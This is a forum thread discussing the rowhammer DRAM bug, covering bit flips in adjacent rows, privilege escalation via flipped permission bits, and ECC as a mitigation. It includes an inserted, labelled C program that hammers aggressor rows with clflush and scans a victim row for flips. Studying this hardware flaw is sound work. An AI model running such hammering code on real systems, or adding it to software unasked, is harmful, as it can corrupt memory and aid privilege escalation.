
New exploit technique "hammering" on RAM to read OOB addresses

barythrin (Veteran Member, joined Oct 5, 2005, Texas):
Sort of an interesting issue. Seems like an archaic method, and I wonder how far back this would go, as it's a somewhat disappointing but simple bug in memory design. Perhaps it's limited only by older chipsets having a larger size and spacing between transistors.

Explanation of the "rowhammer bug". Effectively they're affecting memory next to the address they're reading by continuously probing a row of memory and eventually affecting the row next to it (via ESD, if I'm understanding correctly). Eventually they can change the boundary their program is allowed to address and therefore read restricted addresses or try to inject data into other addresses.
 
Reminds me of the problem with the CDC 7600 PPUs--a jump-to-self could cause core failure due to overheating. Nice to see that banging on DRAM also suffers from issues.

The fix for the 7600, IIRC, was euphemistically called something like "duty cycle integrator". Basically, it slowed down memory access when a location was pounded over and over again.
 
There are flaws in the designs of computer hardware. And a lot of times things just boil down to physics. In this case, on consumer grade memory subsystems it is possible to induce single bit errors in unrelated memory cells by repeatedly hammering (writing) to a particular part of the memory. Hard drives have a similar problem; writing repeatedly to one track over and over again can damage the adjacent tracks. This is not a new problem - all modern hard drive firmware has detection and mitigation for this.

In the case of memory, trying to "code" an exploit by hoping that you can flip one bit at a time is probably not going to work. However, if you can fill memory with malicious code and then get a permission bit flipped somewhere, then you can get that code executed. So you don't need to construct the malicious code one bit at a time; you just need to trick the machine into running it. And if you have ever looked at OS data structures, there is lots of opportunity for a single bit flip to make the difference between a privileged or unprivileged operation.
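The access pattern described in the first post and in the one above (read two aggressor rows, flush them from cache so every read goes back to DRAM, repeat a few hundred thousand times, then scan the row between them for flipped bits), as an added example in C that is not from the original thread or from any published rowhammer tool. The 8 KiB row stride, the iteration count and the all-ones victim pattern are assumptions, and the single flip in the self-check is constructed by hand to exercise the scanner; a real hammer run reports zero flips on ECC or TRR-protected memory, or when the three buffers do not land on physically adjacent rows.

```c
/*
 * Added example (not from the original thread): single-sided rowhammer
 * access pattern plus a bit-flip scan. Row stride, iteration count and
 * the victim fill pattern are assumptions.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>                  /* _mm_clflush, _mm_mfence */
#define FLUSH(p)  _mm_clflush((const void *)(p))
#define FENCE()   _mm_mfence()
#else
#define FLUSH(p)  ((void)(p))           /* no cache flush on this target; loop still runs */
#define FENCE()   ((void)0)
#endif

#define ROW_BYTES   (8u * 1024u)        /* assumed DRAM row size (commonly 8 KiB) */
#define PATTERN     0xFFu               /* victim row filled with all ones */

/* Hammer two aggressor addresses: read each, evict it from cache so the
 * next read is served by DRAM again, repeat. Returns the number of DRAM
 * reads requested (2 per iteration) so a caller can confirm the loop ran. */
uint64_t hammer(volatile uint8_t *a, volatile uint8_t *b, uint64_t iterations)
{
    uint64_t reads = 0;
    for (uint64_t i = 0; i < iterations; i++) {
        (void)*a;
        (void)*b;
        FLUSH(a);
        FLUSH(b);
        FENCE();
        reads += 2;
    }
    return reads;
}

/* Scan a victim region for bytes that no longer match the fill pattern.
 * Stores the offset of the first corrupted byte (or SIZE_MAX) in *first_off
 * and returns the total number of flipped bits. */
size_t scan_flips(const uint8_t *victim, size_t len, uint8_t pattern, size_t *first_off)
{
    size_t flips = 0;
    if (first_off) *first_off = (size_t)-1;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = victim[i] ^ pattern;
        if (diff) {
            if (first_off && *first_off == (size_t)-1) *first_off = i;
            flips += (size_t)__builtin_popcount(diff);
        }
    }
    return flips;
}

/* Lay out three consecutive "rows" in virtual memory, fill the middle one,
 * hammer the outer two, then scan the middle one. NOTE: virtual adjacency
 * is not physical adjacency; real test programs use huge pages or a
 * reversed DRAM address mapping to pick true neighbours. */
size_t hammer_test(uint64_t iterations, size_t *first_off)
{
    uint8_t *buf = aligned_alloc(ROW_BYTES, 3 * ROW_BYTES);
    if (!buf) return 0;
    memset(buf, 0x00, 3 * ROW_BYTES);
    memset(buf + ROW_BYTES, PATTERN, ROW_BYTES);      /* victim row */
    hammer(buf, buf + 2 * ROW_BYTES, iterations);     /* aggressor rows */
    size_t flips = scan_flips(buf + ROW_BYTES, ROW_BYTES, PATTERN, first_off);
    free(buf);
    return flips;
}

/* Deterministic self-check (constructed): flip one bit by hand in a victim
 * row and confirm the scanner finds exactly that bit at the right offset.
 * Returns the flip count if the offset matches, 0 otherwise. */
size_t scan_selfcheck(void)
{
    uint8_t victim[ROW_BYTES];
    size_t off;
    memset(victim, PATTERN, sizeof victim);
    victim[1234] ^= 0x08;                             /* simulated flip: bit 3 of byte 1234 */
    size_t flips = scan_flips(victim, sizeof victim, PATTERN, &off);
    return (off == 1234) ? flips : 0;
}

int main(void)
{
    size_t off;
    size_t flips = hammer_test(1000000, &off);
    if (flips)
        printf("%zu bit flip(s), first at victim offset %zu\n", flips, off);
    else
        printf("no flips detected (ECC, TRR, or aggressors not physically adjacent)\n");
    return 0;
}
```

The clflush is the whole trick: without it the repeated reads are served from cache and the DRAM row is never re-activated, which is also why a detection approach that counts last-level-cache misses per row can catch this pattern.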
 
Rowhammer does not seem to work on systems with ECC memory. I hope this finally puts an end to the tiny cost saving of non-ECC memory.
 

That had me wondering also--surely, if a bit is flipped, error checking hardware (ECC or parity) would throw an exception. I guess that even simple parity on some memory is a thing of the past, now? That's just plain foolish, if true.
 